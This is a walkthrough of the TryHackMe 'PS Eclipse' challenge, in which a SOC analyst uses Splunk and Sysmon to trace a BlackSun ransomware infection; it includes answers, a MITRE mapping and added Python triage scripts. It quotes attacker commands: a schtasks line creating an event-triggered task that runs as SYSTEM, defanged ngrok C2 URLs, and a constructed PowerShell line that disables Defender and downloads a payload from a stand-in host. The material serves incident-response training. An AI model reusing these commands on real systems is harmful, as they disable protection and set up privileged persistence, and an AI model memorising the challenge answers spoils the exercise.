PS Eclipse

TryHackMe Challenge Walkthrough

Challenge Overview

You are a SOC Analyst for an MSSP (Managed Security Service Provider) company called TryNotHackMe.

A customer sent an email asking for an analyst to investigate the events that occurred on Keegan’s machine on Monday, May 16th, 2022. The client noted that the machine is operational, but some files have a weird file extension. The client is worried that there was a ransomware attempt on Keegan’s device.

Your manager has tasked you to check the events in Splunk to determine what occurred in Keegan’s device. 

Happy Hunting!

Threat Analysis Summary

Analyst Summary Report

Incident Title

PowerShell-Based Ransomware Deployment on Keegan’s Workstation

Category

Ransomware, Privilege Escalation, C2 Communication

Detection Source

Sysmon, Splunk, PowerShell Logs

Impact

Ransomware deployment (BlackSun) resulting in encrypted files

Investigation Workflow

  • Identified initial download of a suspicious PowerShell payload
  • Decoded obfuscated base64 PowerShell command using CyberChef
  • Tracked binary download and persistence setup via scheduled task
  • Verified network IOCs and destination IPs via Splunk and Sysmon Event ID 3
  • Analyzed ransomware payload behavior, ransom note creation, and wallpaper modification

Recommendations

  • Block ngrok.io domains and similar tunneling services (ngrok is a reverse-tunnel service, not dynamic DNS) at the firewall/DNS layer
  • Monitor PowerShell logs for encoded or obfuscated command-line usage
  • Restrict the use of `schtasks.exe` for unprivileged users
  • Enable tamper protection and reinforce real-time protection settings in Windows Defender
  • Conduct endpoint scans and isolate systems with matching IOCs

Tools Used

  • Splunk
  • CyberChef
  • Virustotal

Key Evidence

  • Base64-encoded PowerShell command decoded to reveal payload download and scheduled task creation
  • EventCode 3 (Sysmon) network connections from `OUTSTANDING_GUTTER.exe` to `ngrok.io` domains
  • EventCode 1 (Sysmon) showing creation and execution of the suspicious binary from PowerShell
  • VirusTotal hash analysis confirming `script.ps1` is the `blacksun.ps1` ransomware
  • Presence of ransom note saved at: `C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt`
  • Wallpaper replacement image dropped at: `C:\Users\Public\Pictures\blacksun.jpg`

Attack Chain Overview

Initial Access

Malicious PowerShell script downloaded and executed

Execution

PowerShell decoded and ran additional payloads

Persistence

Scheduled task created using schtasks.exe, triggered by event ID 777

Privilege Escalation

Scheduled task configured to run as SYSTEM

Defense Evasion

Windows Defender real-time monitoring disabled via PowerShell

Discovery

Not explicitly observed

Credential Access

Not explicitly observed

Exfiltration

Not explicitly observed

Command & Control

Communication with attacker via ngrok.io HTTP/HTTPS tunnels

Impact

Ransomware deployed (blacksun.ps1), ransom note dropped, wallpaper replaced

MITRE ATT&CK Mapping

| Phase                | ID        | Technique                                     | Description |
|----------------------|-----------|-----------------------------------------------|-------------|
| Execution (initial)  | T1204.002 | User Execution: Malicious File                | User ran the malicious PowerShell command |
| Execution            | T1059.001 | Command and Scripting Interpreter: PowerShell | Used to run payloads, disable Defender, and create/launch the scheduled task |
| Execution            | T1053.005 | Scheduled Task/Job: Scheduled Task            | Task created to execute the binary with SYSTEM privileges |
| Command and Control  | T1105     | Ingress Tool Transfer                         | Remote files downloaded (OUTSTANDING_GUTTER.exe, script.ps1) |
| Defense Evasion      | T1027     | Obfuscated Files or Information               | PowerShell command was Base64-encoded to hide its contents |
| Persistence          | T1053.005 | Scheduled Task/Job: Scheduled Task            | Task triggered whenever Event ID 777 appears in the Application log |
| Privilege Escalation | T1053.005 | Scheduled Task/Job: Scheduled Task            | Task runs as SYSTEM, giving elevated privileges |
| Defense Evasion      | T1562.001 | Impair Defenses: Disable or Modify Tools      | Windows Defender real-time monitoring was disabled |
| Command and Control  | T1071.001 | Application Layer Protocol: Web Protocols     | C2 communications over HTTP/HTTPS via ngrok tunnels |
| Impact               | T1486     | Data Encrypted for Impact                     | blacksun.ps1 encrypted user files and dropped ransom notes |

Reference: MITRE ATT&CK (https://attack.mitre.org/)

Q & A

Q1 A suspicious binary was downloaded to the endpoint. What was the name of the binary?

I started by checking available log sources in Splunk — Sysmon was active, so I focused on EventCode 3 (network connections). That gave a solid view of outbound activity.

I set the date range to 05/16/2022, 00:00 to 24:00, and ran this query:

Splunk Query:

EventCode=3
| stats count as call by Image, DestinationIp, DestinationPort
| table Image, DestinationIp, DestinationPort, call

From the results:

– I found a suspicious executable in C:\Windows\Temp\

– OUTSTANDING_GUTTER.exe made multiple outbound connections over port 443

– I also saw PowerShell making connections to the same destination IP over port 80

That combination was enough to dig deeper.

Next, let's check what PowerShell was doing on port 80. Filtering on the CommandLine field shows a clear red flag: an encoded PowerShell command (-EncodedCommand).
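The grouping the SPL query does, plus the two checks that made these rows stand out (a binary running from Temp, and powershell.exe and that binary talking to the same host), as an added Python example that is not part of the original walkthrough. The Sysmon records below are constructed for the example (RFC 5737 documentation IPs, made-up counts); only the dropped binary's name comes from the investigation.

```python
from collections import defaultdict

# Constructed Sysmon Event ID 3 (network connection) records; they are NOT the
# challenge's telemetry. Field names follow the Splunk Sysmon add-on, IPs are
# RFC 5737 documentation addresses. Only the dropped binary's name is taken
# from the investigation above.
SAMPLE_EVENTS = [
    {"EventCode": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 80},
    {"EventCode": 3, "Image": r"C:\Windows\Temp\OUTSTANDING_GUTTER.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventCode": 3, "Image": r"C:\Windows\Temp\OUTSTANDING_GUTTER.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 443},
    {"EventCode": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    # A process-creation event mixed in, as a real export would have; it must be ignored.
    {"EventCode": 1, "Image": r"C:\Windows\System32\cmd.exe"},
]

# Interpreters an attacker typically uses for the first stage.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Directories every user (or service) can write to; binaries that phone home from
# here deserve a closer look. Plain strings, because a raw string cannot end in "\".
STAGING_DIRS = ("\\windows\\temp\\", "\\users\\public\\", "\\appdata\\local\\temp\\", "\\programdata\\")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def stats_by_image(events):
    """Equivalent of `EventCode=3 | stats count by Image, DestinationIp, DestinationPort`."""
    counts = defaultdict(int)
    for ev in events:
        if ev.get("EventCode") != 3:
            continue
        counts[(ev["Image"], ev["DestinationIp"], int(ev["DestinationPort"]))] += 1
    return dict(counts)


def images_in_staging_dirs(events):
    """Executables running from writable staging directories."""
    return sorted({ev["Image"] for ev in events
                   if any(d in ev.get("Image", "").lower() for d in STAGING_DIRS)})


def shared_destinations(events):
    """Destination IPs contacted both by a script host and by some other binary.

    This is the pattern seen above: powershell.exe fetched the payload over port 80,
    then the dropped binary talked to the same host over 443.
    """
    images_by_ip = defaultdict(set)
    for ev in events:
        if ev.get("EventCode") == 3:
            images_by_ip[ev["DestinationIp"]].add(ev["Image"])
    hits = {}
    for ip, images in images_by_ip.items():
        hosts = {i for i in images if basename(i) in SCRIPT_HOSTS}
        others = images - hosts
        if hosts and others:
            hits[ip] = sorted(others)
    return hits


if __name__ == "__main__":
    for (image, ip, port), n in sorted(stats_by_image(SAMPLE_EVENTS).items()):
        print(f"{n:3d}  {image}  ->  {ip}:{port}")
    print("staging-dir images:", images_in_staging_dirs(SAMPLE_EVENTS))
    print("shared destinations:", shared_destinations(SAMPLE_EVENTS))
```

The same three functions can be pointed at a Splunk export (`| table Image, DestinationIp, DestinationPort, EventCode` saved as JSON) to get the candidate list without re-reading the raw rows by eye.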


Decode it with CyberChef:
– From Base64
– then Decode text (UTF-16LE): -EncodedCommand takes Base64 over UTF-16LE text, which is why a plain Base64 decode shows a null byte between every letter

It revealed the command that downloaded the EXE into the Temp folder.

Answer

OUTSTANDING_GUTTER.exe

Q2 What is the address the binary was downloaded from? Add **http://** to your answer & defang the URL.

We already decoded the base64-encoded PowerShell command earlier, and it clearly showed the URL used to download OUTSTANDING_GUTTER.exe.

For safety, we defang the URL in the usual way (hxxp for http, brackets around :// and around every dot) so it cannot be clicked or resolved by accident.

Answer

hxxp[://]886e-181-215-214-32[.]ngrok[.]io/
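An added example (not from the original post) that does the CyberChef steps from Q1 and the defanging from Q2 in Python: pull the -EncodedCommand argument out of a command line, decode Base64 then UTF-16LE, extract any URLs and defang them in the hxxp[://] style used above, and flag Defender tampering. The encoded command it runs on is constructed here (the URL is a reserved .invalid hostname, not the real ngrok address), so the output mirrors the shape of the finding rather than the actual payload.

```python
import base64
import re

# PowerShell's -EncodedCommand takes Base64 of UTF-16LE text, so an ASCII script
# decodes to one NUL byte after every character: that is the "symbol between
# every letter" you see after a plain From Base64 in CyberChef.
ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"<>()]+", re.IGNORECASE)
# Option used with Set-MpPreference to switch off Defender real-time protection.
DEFENDER_TAMPER = re.compile(r"DisableRealtimeMonitoring", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded script from a powershell -enc command line, or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    raw = base64.b64decode(m.group(1))
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        # Not UTF-16 after all (e.g. a hand-rolled loader); show what is there.
        return raw.decode("latin-1")


def defang(url):
    """hxxp[://]host[.]tld style used in the answers above."""
    return url.replace("http", "hxxp", 1).replace("://", "[://]").replace(".", "[.]")


def triage(cmdline):
    """Decode, pull IOCs and flag Defender tampering; None if nothing is encoded."""
    decoded = decode_encoded_command(cmdline)
    if decoded is None:
        return None
    urls = URL.findall(decoded)
    return {
        "decoded": decoded,
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "defender_tamper": bool(DEFENDER_TAMPER.search(decoded)),
    }


def build_sample_cmdline():
    """Constructed stand-in for the encoded command seen in the logs.

    The download URL is a reserved .invalid name, NOT the real C2; the script body
    only mirrors what the decoded command did (disable Defender, fetch the EXE to Temp).
    """
    script = ("Set-MpPreference -DisableRealtimeMonitoring $true; "
              "wget http://tunnel.example.invalid/OUTSTANDING_GUTTER.exe "
              "-OutFile C:\\Windows\\Temp\\OUTSTANDING_GUTTER.exe")
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
            f"-nop -w hidden -enc {enc}")


if __name__ == "__main__":
    result = triage(build_sample_cmdline())
    print(result["decoded"])
    print("IOCs:", result["defanged"], "| Defender tampering:", result["defender_tamper"])
```

Note that `defang` brackets every dot, including the one in a file name at the end of a URL; that is deliberate, since the whole string should be un-clickable in a report.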

Q3 What Windows executable was used to download the suspicious binary? Enter full path.

We already know the download was done via PowerShell, and the full path was visible in the initial network event logs and command line output.

Answer

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Q4 What command was executed to configure the suspicious binary to run with elevated privileges?

The decoded PowerShell command told us everything. After disabling Defender, it used wget (a PowerShell alias for Invoke-WebRequest) to download the binary into C:\Windows\Temp, then created a scheduled task to run it as SYSTEM.

Here’s what the attacker did:

  • Used schtasks.exe to create a task named OUTSTANDING_GUTTER.exe
  • Set the task to trigger on Event ID 777 in the Application log
  • Specified the task to run as SYSTEM using /RU SYSTEM
  • Forced creation without prompting using /f

This is how the attacker made sure the payload would run with elevated privileges: any Event ID 777 written to the Application log launches the task as SYSTEM.

Answer

"C:\Windows\system32\schtasks.exe" /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\OUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f

Q5 What permissions will the suspicious binary run as? What was the command to run the binary with elevated privileges? **(Format:** **User + ; + CommandLine)**

From the decoded PowerShell, we already know the scheduled task was created to run **as SYSTEM**.

Later in the chain, the attacker used schtasks.exe /Run to manually trigger that task, which executes the binary under the SYSTEM context.

So, we combine the user (NT AUTHORITY\SYSTEM) and the exact command line used to run the task:

Answer

NT AUTHORITY\SYSTEM;"C:\Windows\system32\schtasks.exe" /Run /TN OUTSTANDING_GUTTER.exe
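Added example, not part of the original walkthrough: a small parser that turns schtasks.exe command lines such as the /Create and /Run above into their switches and says why they matter (runs as SYSTEM, event-triggered, action under Temp, /F overwrite), then pairs the /Create with the later /Run of the same task name the way Q5 does. The Sysmon Event ID 1 records are constructed around the two command lines quoted above; the User values and the benign /Query event are made up.

```python
import re

TOKEN = re.compile(r'"[^"]*"|\S+')
SYSTEM_ACCOUNTS = {"system", "nt authority\\system"}
# Writable staging locations; see the Temp drop above.
STAGING_DIRS = ("\\windows\\temp\\", "\\users\\public\\", "\\appdata\\local\\temp\\", "\\programdata\\")
ACTIONS = {"CREATE", "RUN", "DELETE", "CHANGE", "QUERY", "END"}


def parse_schtasks(cmdline):
    """Split a schtasks.exe command line into its action and /switch values.

    Returns None for anything that is not schtasks. Bare switches such as /F map to True.
    """
    tokens = [t.strip('"') for t in TOKEN.findall(cmdline)]
    if not tokens:
        return None
    exe = tokens[0].rsplit("\\", 1)[-1].lower()
    if exe not in ("schtasks.exe", "schtasks"):
        return None
    action, opts, i = None, {}, 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("/"):
            key = tok[1:].upper()
            if key in ACTIONS:
                action = key
            elif i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
                opts[key] = tokens[i + 1]
                i += 1
            else:
                opts[key] = True
        i += 1
    return {"action": action, "options": opts}


def assess(parsed):
    """Why this schtasks invocation matters, one finding per string."""
    o, findings = parsed["options"], []
    if parsed["action"] == "CREATE":
        run_as = o.get("RU")
        if isinstance(run_as, str) and run_as.lower() in SYSTEM_ACCOUNTS:
            findings.append("task runs as SYSTEM")
        if str(o.get("SC", "")).upper() == "ONEVENT":
            findings.append(f"event-triggered: log {o.get('EC')} query {o.get('MO')}")
        if any(d in str(o.get("TR", "")).lower() for d in STAGING_DIRS):
            findings.append(f"action lives in a staging directory: {o.get('TR')}")
        if o.get("F") is True:
            findings.append("/F silently overwrites an existing task of that name")
    elif parsed["action"] == "RUN":
        findings.append(f"task {o.get('TN')} started on demand")
    return findings


def correlate(events):
    """Pair each /Create with the later /Run of the same task name.

    `events` are Sysmon Event ID 1 records with User and CommandLine fields.
    Result maps task name -> run_as, both command lines and the findings.
    """
    chain = {}
    for ev in events:
        parsed = parse_schtasks(ev.get("CommandLine", ""))
        if not parsed or parsed["action"] not in ("CREATE", "RUN") or "TN" not in parsed["options"]:
            continue
        tn = parsed["options"]["TN"]
        entry = chain.setdefault(tn, {"run_as": None, "create_cmd": None, "run_cmd": None, "findings": []})
        if parsed["action"] == "CREATE":
            entry["run_as"] = parsed["options"].get("RU")
            entry["create_cmd"] = ev["CommandLine"]
        else:
            entry["run_cmd"] = ev["CommandLine"]
        entry["findings"] += assess(parsed)
    return chain


# The two schtasks command lines quoted in the answers above, wrapped in constructed
# Event ID 1 records (the User values and the benign /Query event are made up).
CREATE_CMD = ('"C:\\Windows\\system32\\schtasks.exe" /Create /TN OUTSTANDING_GUTTER.exe '
              '/TR C:\\Windows\\Temp\\OUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application '
              '/MO *[System/EventID=777] /RU SYSTEM /f')
RUN_CMD = '"C:\\Windows\\system32\\schtasks.exe" /Run /TN OUTSTANDING_GUTTER.exe'
SAMPLE_EVENTS = [
    {"EventCode": 1, "User": "WORKSTATION\\keegan", "CommandLine": CREATE_CMD},
    {"EventCode": 1, "User": "WORKSTATION\\keegan", "CommandLine": "schtasks.exe /Query /TN Backup"},
    {"EventCode": 1, "User": "WORKSTATION\\keegan", "CommandLine": RUN_CMD},
]

if __name__ == "__main__":
    for task, info in correlate(SAMPLE_EVENTS).items():
        print(f"{task} -> runs as {info['run_as']}")
        for finding in info["findings"]:
            print("   -", finding)
```

The /Run is what actually moves the binary into the SYSTEM context on the spot; without it the task would sit idle until something wrote Event ID 777, which is why the correlation keys on the task name rather than on the process that issued the command.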

Q6 The suspicious binary connected to a remote server. What address did it connect to? Add **http://** to your answer & defang the URL.

To trace the network activity of OUTSTANDING_GUTTER.exe, I filtered for its events and checked the QueryName field (Sysmon Event ID 22, DNS query). This showed the domain the binary reached out to after execution.

The pattern is similar to the first ngrok domain — just a different subdomain.

Defang the URL as before and we have our answer.

Answer

hxxp[://]9030-181-215-214-32[.]ngrok[.]io

Q7 A PowerShell script was downloaded to the same location as the suspicious binary. What was the name of the file?

Since OUTSTANDING_GUTTER.exe was dropped in C:\Windows\Temp, I searched for .ps1 files created in that same folder using:

Splunk Query:

TargetFilename="C:\\Windows\\Temp\\*.ps1"
| table TargetFilename
| dedup TargetFilename

Only one result came up — script.ps1.

To be sure this was part of the ransomware chain, I checked its hash on VirusTotal:
SHA256: E5429F2E44990B3D4E249C566FBF19741E671C0E40B809F87248D9EC9114BEF9

It was flagged as ransomware, confirming this was our next-stage payload.

Answer

script.ps1

powercat.ps1 used to establish reverse shell

Q8 The malicious script was flagged as malicious. What do you think was the actual name of the malicious script?

The result identified the script as part of the BlackSun ransomware family. So even though the filename was script.ps1, the actual malware name is known.

Answer

blacksun.ps1

Q9 A ransomware note was saved to disk, which can serve as an IOC. What is the full path to which the ransom note was saved?

Knowing the ransomware was BlackSun, I looked for ransom notes — these are typically .txt files and often include “README” in the name.

I filtered for filenames matching BlackSun*.txt and found exactly what we were looking for:

The ransom note was saved in the victim’s Downloads folder under a random subdirectory.

Answer

C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt

Q10 The script saved an image file to disk to replace the user's desktop wallpaper, which can also serve as an IOC. What is the full path of the image?

Most ransomware families modify the desktop wallpaper, and BlackSun is no different.

So we can just look for image files written to disk (`*.jpeg OR *.jpg OR *.png`). A quick search online confirms that BlackSun replaces the wallpaper with a file named blacksun.jpg.

Answer

C:\Users\Public\Pictures\blacksun.jpg

Conclusion

One innocent-looking PowerShell command later, and we’ve got a scheduled task running as SYSTEM, Defender taking a nap, and ransomware dropping in like it owns the place.

The attacker didn’t waste time: base64 obfuscation, ngrok C2, and a second-stage payload (hello, blacksun.ps1) that encrypted everything but the wallpaper — which they helpfully replaced for us. All the usual red flags were waving: shady URLs, encoded scripts, and a blatant disregard for endpoint safety.

If nothing else, it’s a textbook reminder that PowerShell visibility isn’t optional — unless, of course, you enjoy surprise encryption.